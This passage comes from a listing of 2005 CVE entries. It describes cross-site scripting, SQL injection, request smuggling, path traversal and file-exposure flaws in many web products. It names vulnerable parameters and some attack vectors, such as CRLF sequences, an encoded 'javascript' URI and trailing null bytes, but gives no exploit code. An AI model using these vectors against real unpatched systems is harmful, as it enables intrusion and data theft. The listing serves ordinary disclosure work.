attackers to inject arbitrary web script or HTML via an attachment, which is automatically downloaded and processed as HTML. [CVE-2005-2539] Multiple cross-site scripting (XSS) vulnerabilities in FlatNuke 2.5.5 and possibly earlier versions allow remote attackers to inject arbitrary web script or HTML via the (1) bodycolor, (2) backimage, (3) theme, or (4) logo parameter to structure.php, (5) admin, (6) admin_mail, or (7) back parameter to footer.php, or (8) the message body in a news post. [CVE-2005-2524] Safari after 2.0 in Apple Mac OS X 10.3.9 allows remote attackers to bypass domain restrictions via crafted web archives that cause Safari to render them as if they came from a different site. [CVE-2005-2523] Multiple cross-site scripting (XSS) vulnerabilities in Weblog Server in Mac OS X 10.4 to 10.4.2 allow remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2005-2522] Safari in WebKit in Mac OS X 10.4 to 10.4.2 directly accesses URLs within PDF files without the normal security checks, which allows remote attackers to execute arbitrary code via links in a PDF file. [CVE-2005-2489] Web Content Management News System allows remote attackers to create arbitrary accounts and gain privileges via a direct request to Admin/Users/AddModifyInput.php. [CVE-2005-2488] Cross-site scripting (XSS) vulnerability in Web Content Management News System allows remote attackers to inject arbitrary web script or HTML via (1) the strRootpath parameter to validsession.php or (2) the strTable parameter to Admin/News/List.php. [CVE-2005-2485] Cross-site scripting (XSS) vulnerability in the Helpdesk in Logicampus before 1.1.1 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2005-2482] The StateToOptions function in msfweb in Metasploit Framework 2.4 and earlier, when running with the -D option (defanged mode), allows attackers to modify temporary environment variables before the "_Defanged" environment option is checked when processing the Exploit command. [CVE-2005-2480] Cross-site scripting (XSS) vulnerability in ColdFusion Fusebox 4.1.0 allows remote attackers to inject arbitrary web script or HTML via the fuseaction parameter, which is not quoted in an error page, as demonstrated using index.cfm. [CVE-2005-2476] Cross-site scripting (XSS) vulnerability in lost_passowrd.php in Naxtor Shopping Cart 1.0 allows remote attackers to inject arbitrary web script or HTML via the email parameter. [CVE-2005-2467] Multiple cross-site scripting (XSS) vulnerabilities in MySQL Eventum 1.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to view.php, (2) release parameter to list.php, or (3) F parameter to get_jsrs_data.php. [CVE-2005-2465] Cross-site scripting (XSS) vulnerability in pm.php in PCXP/TOPPE CMS allows remote attackers to inject arbitrary web script or HTML via the msg variable. [CVE-2005-2460] Multiple cross-site scripting (XSS) vulnerabilities in Kayako liveResponse 2.x allow remote attackers to inject arbitrary web script or HTML via the (1) username parameter or (2) name field when entering a session or sending a message. [CVE-2005-2455] Greasemonkey before 0.3.5 allows remote web servers to (1) read arbitrary files via a GET request to a file:// URL in the GM_xmlhttpRequest API function, (2) list installed scripts using GM_scripts, or obtain sensitive information via (3) GM_setValue and GM_getValue. [CVE-2005-2453] Cross-site scripting (XSS) vulnerability in NetworkActiv Web Server 1.0, 2.0.0.6, 3.0.1.1, and 3.5.13, and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via the query string. [CVE-2005-2443] Kshout 2.x and 3.x stores settings.dat under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as usernames and passwords. [CVE-2005-2442] Cross-Application Scripting (XAS) vulnerability in SPI Dynamics WebInspect 5.0.196 allows remote attackers to inject Javascript from one application into another. [CVE-2005-2441] Multiple cross-site scripting (XSS) vulnerabilities in VBzoom allow remote attackers to inject arbitrary web script and HTML via the (1) UserName parameter to profile.php or (2) UserID parameter to login.php. [CVE-2005-2440] SQL injection vulnerability in login.asp in Thomson Web Skill Vantage Manager allows remote attackers to execute arbitrary SQL commands via the svmPassword parameter. [CVE-2005-2437] Website Baker Project does not properly verify the file extensions of uploaded files, which allows remote attackers to upload and execute arbitrary PHP code. [CVE-2005-2436] browse.php in Website Baker Project allows remote attackers to obtain sensitive data via (1) a directory that does not exist in the dir parameter or (2) a direct request to certain php files, which reveal the path in an error message. [CVE-2005-2435] Cross-site scripting (XSS) vulnerability in browse.php in Website Baker Project allows remote attackers to inject arbitrary web script or HTML via the dir parameter. [CVE-2005-2430] Multiple cross-site scripting (XSS) vulnerabilities in GForge 4.5 allow remote attackers to inject arbitrary web script or HTML via the (1) forum_id or (2) group_id parameter to forum.php, (3) project_task_id parameter to task.php, (4) id parameter to detail.php, (5) the text field on the search page, (6) group_id parameter to qrs.php, (7) form, (8) rows, (9) cols or (10) wrap parameter to notepad.php, or the login field on the login form. [CVE-2005-2428] Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696. [CVE-2005-2427] Cross-site scripting (XSS) vulnerability in viewCart.asp in CartWIZ allows remote attackers to inject arbitrary web script or HTML via the message parameter. [CVE-2005-2422] Cross-site scripting (XSS) vulnerability in index.php in Beehive Forum allows remote attackers to inject arbitrary web script or HTML via the webtag parameter. [CVE-2005-2421] Multiple SQL injection vulnerabilities in index.php and other pages in Beehive Forum allow remote attackers to execute arbitrary SQL commands via the webtag parameter. [CVE-2005-2416] Multiple cross-site scripting (XSS) vulnerabilities in Contrexx before 1.0.5 allow remote attackers to inject arbitrary web script or HTML via the (1) term parameter to the search module or (2) title in the blog aggregation module. [CVE-2005-2414] Race condition in the xpcom library, as used by web browsers such as Firefox, Mozilla, Netscape, and Galeon, allows remote attackers to cause a denial of service (application crash) via a large HTML file that loads a DOM call from within nested DIV tags, which causes part of the currently rendering page and referenced objects to be deleted. [CVE-2005-2402] Cross-site scripting (XSS) vulnerability in search.php in PHPSiteSearch 1.7.7d allows remote attackers to inject arbitrary web script or HTML via the query parameter. [CVE-2005-2397] Cross-site scripting (XSS) vulnerability in guestbook.php in phpBook 1.46 allows remote attackers to inject arbitrary web script or HTML via the admin parameter. [CVE-2005-2396] Cross-site scripting (XSS) vulnerability in MediaWiki 1.4.6 and earlier allows remote attackers to inject arbitrary web script or HTML via a parameter to the page move template. [CVE-2005-2393] Cross-site scripting (XSS) vulnerability in CuteNews 1.3.6 allows remote attackers to inject arbitrary web script or HTML via (1) the lastusername parameter to index.php or (2) selected_search_arch parameter to search.php. [CVE-2005-2392] Cross-site scripting (XSS) vulnerability in index.php for CMSimple 2.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the search parameter in the search function. [CVE-2005-2386] Cross-site scripting (XSS) vulnerability in viewCart.asp in CartWIZ 1.20 allows remote attackers to inject arbitrary web script or HTML via the message parameter. [CVE-2005-2380] Multiple cross-site scripting vulnerabilities in PHP Surveyor 0.98 allow remote attackers to inject arbitrary web script or HTML via the (1) sid, (2) start, and (3) id parameters to browse.php, or the sid parameter to (4) dataentry.php or (5) export.php. [CVE-2005-2379] Multiple cross-site scripting (XSS) vulnerabilities in Oracle Reports 9.0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) debug parameter to showenv, (2) test parameter to parsequery, or (3) delimiter or (4) CELLWRAPPER parameter to rwservlet. [CVE-2005-2343] Research in Motion (RIM) BlackBerry Handheld web browser for BlackBerry Handheld before 4.0.2 allows remote attackers to cause a denial of service (hang) via a Java Application Description (JAD) file with a long application name and vendor string, which prevents a browser dialog from being properly dismissed. [CVE-2005-2339] Cross-site scripting (XSS) vulnerability in the Unicode version of msearch (unicode-msearch) 1.51(U1)-beta1, 1.51(U1), and 1.52(U1) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2005-2338] Multiple cross-site scripting (XSS) vulnerabilities in XOOPS 2.0.12 JP and earlier, XOOPS 2.0.13.1 and earlier, and 2.2.x up to 2.2.3 RC1 allow remote attackers to inject arbitrary web script or HTML via (1) modules that use "XOOPS Code" and (2) newbb in the forum module. [CVE-2005-2336] Cross-site scripting (XSS) vulnerability in Hiki 0.8.0 to 0.8.2 allows remote attackers to inject arbitrary web script or HTML via "missing pages" in which the page name is not properly escaped, a different vulnerability than CVE-2005-2803. [CVE-2005-2333] Cross-site scripting (XSS) vulnerability in smilies_popup.php in SEO-Board 1.0 allows remote attackers to inject arbitrary web script or HTML via the doc parameter. [CVE-2005-2332] Cross-site scripting (XSS) vulnerability in PHPPageProtect 1.0.0a allows remote attackers to inject arbitrary web script or HTML via the username parameter to (1) admin.php or (2) login.php. [CVE-2005-2327] Cross-site scripting (XSS) vulnerability in e107 0.617 and earlier allows remote attackers to inject arbitrary web script or HTML via nested [url] BBCode tags. [CVE-2005-2326] Cross-site scripting (XSS) vulnerability in Clever Copy 2.0 and 2.0a allows remote attackers to inject arbitrary web script or HTML via the yr parameter to calendar.php. [CVE-2005-2325] Clever Copy 2.0 and 2.0a allows remote attackers to obtain the full path of the web root via a direct request to (1) ticker.php, (2) menu.php, (3) banned.php, (4) endlayout.php, (5) randomhlinesblock.php, (6) showlast.php, (7) showlast5class1.php, (8) showlast5phorum.php, (9) showlast5phorumblock.php, (10) showlastforumbb2.php, or (11) showlastforumbb2block.php. [CVE-2005-2324] Cross-site scripting (XSS) vulnerability in Clever Copy 2.0 and 2.0a allows remote attackers to inject arbitrary web script or HTML via the searchtype or searchterm parameters to (1) results.php or (2) categorysearch.php. [CVE-2005-2322] Cross-site scripting (XSS) vulnerability in Class-1 Forum 0.24.4 and 0.23.2, and Clever Copy with forums installed, allows remote attackers to inject arbitrary web script or HTML via the (1) viewuser_id or (2) group parameter to users.php. [CVE-2005-2320] WebCalendar before 1.0.0 does not properly restrict access to assistant_edit.php, which allows remote attackers to gain privileges. [CVE-2005-2318] Cross-site scripting (XSS) vulnerability in showerr.asp in DVBBS 7.1 SP2 allows remote attackers to inject arbitrary web script or HTML via the action parameter. [CVE-2005-2299] Multiple cross-site scripting (XSS) vulnerabilities in Simple Message Board Version 2.0 Beta 1 allow remote attackers to inject arbitrary web script or HTML via the (1) FID parameter to forum.cfm, (2) UID parameter to user.cfm, (3) TID parameter to thread.cfm, or (4) PostDate parameter to search.cfm. [CVE-2005-2290] wps_shop.cgi in WPS Web Portal System 0.7.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) art and (2) cat variables. [CVE-2005-2288] Cross-site scripting (XSS) vulnerability in PHPCounter 7.2 allows remote attackers to inject arbitrary web script or HTML via the EpochPrefix parameter. [CVE-2005-2286] WebEOC before 6.0.2 does not properly check user authorization, which allows remote attackers to gain privileges via a direct request to a resource. [CVE-2005-2285] WebEOC before 6.0.2 stores sensitive information in locations such as URIs, web pages, and configuration files, which allows remote attackers to obtain information such as Usernames, Passwords, Emergency information, medical information, and system configuration. [CVE-2005-2284] Multiple SQL injection vulnerabilities in WebEOC before 6.0.2 allow remote attackers to modify SQL statements via unknown attack vectors. [CVE-2005-2283] WebEOC before 6.0.2 does not properly restrict the size of an uploaded file, which allows remote authenticated users to cause a denial of service (system and database resource consumption) via a large file. [CVE-2005-2282] Multiple cross-site scripting (XSS) vulnerabilities in WebEOC before 6.0.2 allow remote attackers to inject arbitrary web script and HTML via unknown vectors. [CVE-2005-2281] WebEOC before 6.0.2 uses a weak encryption scheme for passwords, which makes it easier for attackers to crack passwords. [CVE-2005-2276] Cross-site scripting (XSS) vulnerability in Novell Groupwise WebAccess 6.5 before July 11, 2005 allows remote attackers to inject arbitrary web script or HTML via an e-mail message with an encoded javascript URI (e.g. "j&#X41vascript" in an IMG tag. [CVE-2005-2274] Microsoft Internet Explorer 6.0 does not clearly associate a Javascript dialog box with the web page that generated it, which allows remote attackers to spoof a dialog box from a trusted site and facilitates phishing attacks, aka the "Dialog Origin Spoofing Vulnerability." [CVE-2005-2273] Opera 7.x and 8 before 8.01 does not clearly associate a Javascript dialog box with the web page that generated it, which allows remote attackers to spoof a dialog box from a trusted site and facilitates phishing attacks, aka the "Dialog Origin Spoofing Vulnerability." [CVE-2005-2272] Safari version 2.0 (412) does not clearly associate a Javascript dialog box with the web page that generated it, which allows remote attackers to spoof a dialog box from a trusted site and facilitates phishing attacks, aka the "Dialog Origin Spoofing Vulnerability." [CVE-2005-2271] iCab 2.9.8 does not clearly associate a Javascript dialog box with the web page that generated it, which allows remote attackers to spoof a dialog box from a trusted site and facilitates phishing attacks, aka the "Dialog Origin Spoofing Vulnerability." [CVE-2005-2268] Firefox before 1.0.5 and Mozilla before 1.7.9 does not clearly associate a Javascript dialog box with the web page that generated it, which allows remote attackers to spoof a dialog box from a trusted site and facilitates phishing attacks, aka the "Dialog Origin Spoofing Vulnerability." [CVE-2005-2266] Firefox before 1.0.5 and Mozilla before 1.7.9 allows a child frame to call top.focus and other methods in a parent frame, even when the parent is in a different domain, which violates the same origin policy and allows remote attackers to steal sensitive information such as cookies and passwords from web sites whose child frames do not verify that they are in the same domain as their parents. [CVE-2005-2260] The browser user interface in Firefox before 1.0.5, Mozilla before 1.7.9, and Netscape 8.0.2 and 7.2 does not properly distinguish between user-generated events and untrusted synthetic events, which makes it easier for remote attackers to perform dangerous actions that normally could only be performed manually by the user. [CVE-2005-2254] Multiple cross-site scripting (XSS) vulnerabilities in PhpAuction 2.5 allow remote attackers to inject arbitrary web script or HTML via the lan parameter to (1) index.php or (2) admin/index.php, or (3) the auction_id parameter to profile.php. NOTE: there is evidence that viewnews.php and login.php may not be part of the PhpAuction product, so they are not included in this description. [CVE-2005-2235] Buffer overflow in the diagTasksWebSM command in IBM AIX 5.1, 5.2 and 5.3, might allow local users to execute arbitrary code via long command line arguments. [CVE-2005-2229] Blog Torrent 0.92 and earlier stores sensitive files under the web document root in the (1) data or (2) torrents directories with insufficient access control, which allows remote attackers to obtain sensitive information such as account names and password hashes, as demonstrated using data/newusers. [CVE-2005-2228] Web Wiz Forums 7.9 and 8.0 allows remote attackers to view message titles of a hidden forum. [CVE-2005-2224] aspnet_wp.exe in Microsoft ASP.NET web services allows remote attackers to cause a denial of service (CPU consumption from infinite loop) via a crafted SOAP message to an RPC/Encoded method. [CVE-2005-2217] Dansie Shopping Cart stores the vars.dat file under the web root with insufficient access control, which might allow remote attackers to obtain sensitive information such as program variables. [CVE-2005-2215] Cross-site scripting (XSS) vulnerability in MediaWiki before 1.4.x before 1.4.6 and 1.5 before 1.5beta3 allows remote attackers to inject arbitrary web script or HTML via a parameter in the page move template, a different vulnerability than CVE-2005-1888. [CVE-2005-2207] Cross-site scripting (XSS) vulnerability in store/login.asp in CartWIZ allows remote attackers to inject arbitrary web script or HTML via the message parameter. [CVE-2005-2204] Cross-site scripting (XSS) vulnerability in Computer Associates (CA) eTrust SiteMinder 5.5, when the "CSSChecking" parameter is set to "NO," allows remote attackers to inject arbitrary web script or HTML via the (1) PASSWORD or (2) BUFFER parameters to smpwservicescgi.exe, (3) the TARGET parameter to login.fcc, and possibly other vectors. [CVE-2005-2202] Cross-site scripting (XSS) vulnerability in the MicroServer Web Server for Xerox WorkCentre Pro Color 2128, 2636, and 3545, version 0.001.04.044 through 0.001.04.504, allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2005-2201] Unknown vulnerability in the MicroServer Web Server for Xerox WorkCentre Pro Color 2128, 2636, and 3545, version 0.001.04.044 through 0.001.04.504, allow attackers to cause a denial of service or access files via crafted HTTP requests. [CVE-2005-2200] Multiple unknown vulnerabilities in the MicroServer Web Server for Xerox WorkCentre Pro Color 2128, 2636, and 3545, version 0.001.04.044 through 0.001.04.504, allow attackers to bypass authentication. [CVE-2005-2199] PHP remote file inclusion vulnerability in inc/functions.inc.php in PPA web photo gallery 0.5.6 allows remote attackers to execute arbitrary code via the config[ppa_root_path] variable. [CVE-2005-2191] Multiple cross-site scripting (XSS) vulnerabilities in Comersus shopping cart allow remote attackers to inject arbitrary web script or HTML via the (1) name parameter to comersus_backoffice_listAssignedPricesToCustomer.asp or (2) message parameter to comersus_backoffice_message.asp. [CVE-2005-2189] Lantronix SecureLinx console server running firmware 2.0 and 3.0 stores /etc/ssh under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as SSH private keys. [CVE-2005-2186] Multiple cross-site scripting (XSS) vulnerabilities in McAfee IntruShield Security Management System allow remote authenticated users to inject arbitrary web script or HTML via the (1) thirdMenuName or (2) resourceName parameter to SystemEvent.jsp. [CVE-2005-2176] Novell NetMail automatically processes HTML in an attachment without prompting the user to save or open it, which makes it easier for remote attackers to conduct web-based attacks and steal cookies. [CVE-2005-2167] Cross-site scripting (XSS) vulnerability in index.php in Plague News System 0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the cid parameter. [CVE-2005-2163] Cross-site scripting (XSS) vulnerability in index.php in AutoIndex PHP Script 1.5.2 allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2005-2161] Cross-site scripting (XSS) vulnerability in phpBB 2.0.16 allows remote attackers to inject arbitrary web script or HTML via nested [url] tags. [CVE-2005-2143] Microsoft Front Page allows attackers to cause a denial of service (crash) via a crafted style tag in a web page. [CVE-2005-2138] Cross-site scripting (XSS) vulnerability in index.php in Comdev eCommerce 3.0 and 3.1 allows remote attackers to inject arbitrary web script or HTML via Javascript in the onMouseOver event of an "A" tag in a review message. [CVE-2005-2135] SQL injection vulnerability in verify.asp in EtoShop Dynamic Biz Website Builder (QuickWeb) 1.0 allows remote attackers to execute arbitrary SQL commands via the (1) T1 or (2) T2 parameters. [CVE-2005-2127] Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not intended for use within Internet Explorer, as originally demonstrated using the (1) DDS Library Shape Control (Msdds.dll) COM object, and other objects including (2) Blnmgrps.dll, (3) Ciodm.dll, (4) Comsvcs.dll, (5) Danim.dll, (6) Htmlmarq.ocx, (7) Mdt2dd.dll (as demonstrated using a heap corruption attack with uninitialized memory), (8) Mdt2qd.dll, (9) Mpg4ds32.ax, (10) Msadds32.ax, (11) Msb1esen.dll, (12) Msb1fren.dll, (13) Msb1geen.dll, (14) Msdtctm.dll, (15) Mshtml.dll, (16) Msoeacct.dll, (17) Msosvfbr.dll, (18) Mswcrun.dll, (19) Netshell.dll, (20) Ole2disp.dll, (21) Outllib.dll, (22) Psisdecd.dll, (23) Qdvd.dll, (24) Repodbc.dll, (25) Shdocvw.dll, (26) Shell32.dll, (27) Soa.dll, (28) Srchui.dll, (29) Stobject.dll, (30) Vdt70.dll, (31) Vmhelper.dll, and (32) Wbemads.dll, aka a variant of the "COM Object Instantiation Memory Corruption vulnerability." [CVE-2005-2117] Web View in Windows Explorer on Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 does not properly handle certain HTML characters in preview fields, which allows remote user-assisted attackers to execute arbitrary code. [CVE-2005-2112] Multiple cross-site scripting (XSS) vulnerabilities in XOOPS 2.0.11 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) order parameter to edit.php or (2) cid parameter to comment_edit.php. [CVE-2005-2111] login.cgi in Community Link Pro Web Editor allows remote attackers to execute arbitrary commands via the file parameter. [CVE-2005-2107] Multiple cross-site scripting (XSS) vulnerabilities in post.php in WordPress 1.5.1.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) p or (2) comment parameter. [CVE-2005-2094] Sun SunONE web server 6.1 SP1 allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes SunONE to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling." [CVE-2005-2093] Oracle 9i Application Server (Oracle9iAS) 9.0.2 allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Application Server to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling." [CVE-2005-2092] BEA Systems WebLogic 8.1 SP1 allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes WebLogic to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling." [CVE-2005-2091] IBM WebSphere 5.1 and WebSphere 5.0 allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes WebSphere to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling." [CVE-2005-2090] Jakarta Tomcat 5.0.19 (Coyote/1.1) and Tomcat 4.1.24 (Coyote/1.0) allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Tomcat to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling." [CVE-2005-2089] Microsoft IIS 5.0 and 6.0 allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes IIS to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling." [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling." [CVE-2005-2087] Internet Explorer 5.01 SP4 up to 6 on various Windows operating systems, including IE 6.0.2900.2180 on Windows XP, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not ActiveX controls, as demonstrated using the JVIEW Profiler (Javaprxy.dll). NOTE: the researcher says that the vendor could not reproduce this problem. [CVE-2005-2084] Cross-site scripting (XSS) vulnerability in SearchResults.aspx in Community Forum allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2005-2077] Cross-site scripting (XSS) vulnerability in error.asp for Hosting Controller allows remote attackers to inject arbitrary web script or HTML via the error parameter. [CVE-2005-2075] PHP-Fusion 5.0 and 6.0 stores the database file with a predictable filename under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to the filename in the administration/db_backups directory in PHP-Fusion 6.0 or the fusion_admin/db_backups directory in 5.0. [CVE-2005-2074] Cross-site scripting (XSS) vulnerability in PHP-Fusion 6.0.105 allows remote attackers to inject arbitrary web script or HTML via a news or article post, possibly involving the (1) news_body, (2) article_description, or (3) article_body parameters to submit.php. [CVE-2005-2065] HTTP response splitting vulnerability in language_select.asp in ASP Nuke 0.80 allows remote attackers to spoof web content and poison web caches via CRLF ("%0d%0a") sequences in the LangCode parameter. [CVE-2005-2064] Multiple cross-site scripting vulnerabilities in ASP Nuke 0.80 allow remote attackers to inject arbitrary web script or HTML via the (1) email parameter to forgot_password.asp, or the (2) FirstName, (3) LastName, (4) Username, (5) Password, (6) Address1, (7) Address2, (8) City, (9) ZipCode, (10) Email parameter to register.asp. [CVE-2005-2063] Multiple cross-site scripting (XSS) vulnerabilities in ActiveBuyAndSell 6.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Title parameter to sendpassword.asp or (2) Keyword field in search.asp. [CVE-2005-2060] Multiple HTTP Response Splitting vulnerabilities in (1) toggleshow.php, (2) togglecats.php, and (3) showprofile.php in Infopop UBB.Threads before 6.5.2 Beta allow remote attackers to spoof web content and poison web caches via CRLF ("%0d%0a") sequences in the Cat parameter. [CVE-2005-2057] Multiple cross-site scripting (XSS) vulnerabilities in Infopop UBB.Threads before 6.5.2 Beta allow remote attackers to inject arbitrary web script or HTML via the (1) Searchpage parameter to dosearch.php, (2) Number, (3) what, or (4) page parameter to newreply.php, (5) Number, (6) Board, or (7) what parameter to showprofile.php, (8) fpart or (9) page parameter to showflat.php, or (10) like parameter to showmembers.php. [CVE-2005-2055] RealPlayer 8, 10, 10.5 (6.0.12.1040-1069), and Enterprise and RealOne Player v1 and v2 allows remote malicious web server to create an arbitrary HTML file that executes an RM file via "default settings of earlier Internet Explorer browsers". [CVE-2005-2051] Buffer overflow in the VERITAS Backup Exec Web Administration Console (BEWAC) 9.0 4367 through 10.0 rev. 5484 allows remote attackers to execute arbitrary code. [CVE-2005-2044] Multiple cross-site scripting (XSS) vulnerabilities in ATutor 1.4.3 and 1.5 RC 1 allow remote attackers to inject arbitrary web script or HTML via the (1) show_course parameter to browse.php, (2) subject parameter to contact.php, (3) cid parameter to content.php, (4) l parameter to inbox/send_message.php, the (5) search, (6) words, (7) include, (8) find_in, (9) display_as, or (10) search parameter to search.php, the (11) submit, (12) query, or (13) field parameter to tile.php, the (14) us parameter to forum/subscribe_forum.php, or the (15) roles[], (16) status, (17) submit, or (18) reset_filter parameters to directory.php. [CVE-2005-2042] Cross-site scripting (XSS) vulnerability in ajax-spell before 1.8 allows remote attackers to inject arbitrary web script or HTML via onmouseover or other events in HTML tags. [CVE-2005-2034] Cross-site scripting (XSS) vulnerability in folderview.asp for BlueCollar iGallery 3.3 allows remote attackers to inject arbitrary web script or HTML via the folder parameter. [CVE-2005-2029] amaroK Web Frontend 1.3 stores the globals.inc file under the web root without a .php extension and insufficient access control, which allows remote attackers to obtain the database username and password via a direct request to the file. [CVE-2005-2022] Unknown vulnerability in Webmail in iPlanet Messaging Server 5.2 Patch 1 and Sun ONE Messaging Server 6.2 allows remote attackers to execute arbitrary Javascript, possibly due to a cross-site scripting (XSS) vulnerability. [CVE-2005-2021] Cross-site scripting (XSS) vulnerability in cPanel 9.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the user parameter in the login page. [CVE-2005-2020] Directory traversal vulnerability in the web server for 3Com Network Supervisor 5.0.2 allows remote attackers to read arbitrary files via ".." sequences in the URL to TCP port 21700. [CVE-2005-2011] Multiple cross-site scripting (XSS) vulnerabilities in paFAQ 1.0 Beta 4 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the id parameter in a Question action. [CVE-2005-2010] Cross-site scripting (XSS) vulnerability in trackback.asp in Ublog Reload 1.0.5 allows remote attackers to inject arbitrary web script or HTML via the btitle parameter. [CVE-2005-2008] Yaws Webserver 1.55 and earlier allows remote attackers to obtain the source code for yaws scripts via a request to a yaw script with a trailing %00 (null). [CVE-2005-2005] Ultimate PHP Board (UPB) 1.9.6 GOLD and earlier stores the users.dat file under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information on registered users via a direct request to db/users.dat. [CVE-2005-2004] Multiple cross-site scripting vulnerabilities in Ultimate PHP Board (UPB) 1.9.6 GOLD and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) ref parameter to login.php, (2) id or (3) page parameter to viewtopic.php, id parameter to (4) profile.php, (5) newpost.php, (6) email.php, (7) icq.php, or (8) aol.php, (9) t_id parameter to newpost.php, (10) ref parameter to getpass.php, or (11) sText parameter to search.php. [CVE-2005-1999] Multiple cross-site scripting (XSS) vulnerabilities in pafiledb.php in paFileDB 3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) sortby or (2) filelist parameters to the category action (category.php), or (3) pages parameter in the viewall action (viewall.php). [CVE-2005-1990] Internet Explorer 5.0, 5.5, and 6.0 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not ActiveX controls, including (1) devenum.dll, (2) diactfrm.dll, (3) wmm2filt.dll, (4) fsusd.dll, (5) dmdskmgr.dll, (6) browsewm.dll, (7) browseui.dll, (8) shell32.dll, (9) mshtml.dll, (10) inetcfg.dll, (11) infosoft.dll, (12) query.dll, (13) syncui.dll, (14) clbcatex.dll, (15) clbcatq.dll, (16) comsvcs.dll, and (17) msconf.dll, which causes memory corruption, aka "COM Object Instantiation Memory Corruption Vulnerability," a different vulnerability than CVE-2005-2087. [CVE-2005-1989] Unknown vulnerability in Internet Explorer 5.0, 5.5, and 6.0 allows remote attackers to obtain information and possibly execute code when browsing from a web site to a web folder view using WebDAV, aka "Web Folder Behaviors Cross-Domain Vulnerability". [CVE-2005-1988] Unknown vulnerability in Internet Explorer 5.0, 5.5, and 6.0 allows remote attackers to execute arbitrary code via a web site or an HTML e-mail containing a crafted JPEG image that causes memory corruption, aka "JPEG Image Rendering Memory Corruption Vulnerability". [CVE-2005-1975] Multiple cross-site scripting (XSS) vulnerabilities in Annuaire 1Two 1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the id parameter to index.php, or the (2) site_id, (3) nom, (4) email, or (5) commentaire parameters in commentaires.php. [CVE-2005-1973] Java Web Start in Java 2 Platform Standard Edition (J2SE) 5.0 and 5.0 Update 1 allows applications to assign permissions to themselves and gain privileges. [CVE-2005-1969] Cross-site scripting (XSS) vulnerability in Pragma Systems Telnetserver 6.0 allows remote attackers to inject arbitrary web script or HTML, and hide activities in log files, via a "<!--" (HTML comment) in a session. [CVE-2005-1968] Cross-site scripting (XSS) vulnerability in ProductCart Ecommerce before 2.7 allows remote attackers to inject arbitrary web script or HTML via the error parameter to techErr.asp. [CVE-2005-1962] Cross-site scripting (XSS) vulnerability in Cerberus Helpdesk 0.97.3 allows remote attackers to inject arbitrary web script or HTML via the (1) errorcode parameter to index.php or (2) certain fields to clients.php. [CVE-2005-1961] Unknown vulnerability in ObjectWeb Consortium C-JDBC before 1.3.1 allows local users to bypass intended access restrictions and obtain the cache results from another user. [CVE-2005-1955] Cross-site scripting (XSS) vulnerability in index.php in singapore 0.9.11 allows remote attackers to inject arbitrary web script or HTML via the gallery parameter. [CVE-2005-1951] Multiple HTTP Response Splitting vulnerabilities in osCommerce 2.2 Milestone 2 and earlier allow remote attackers 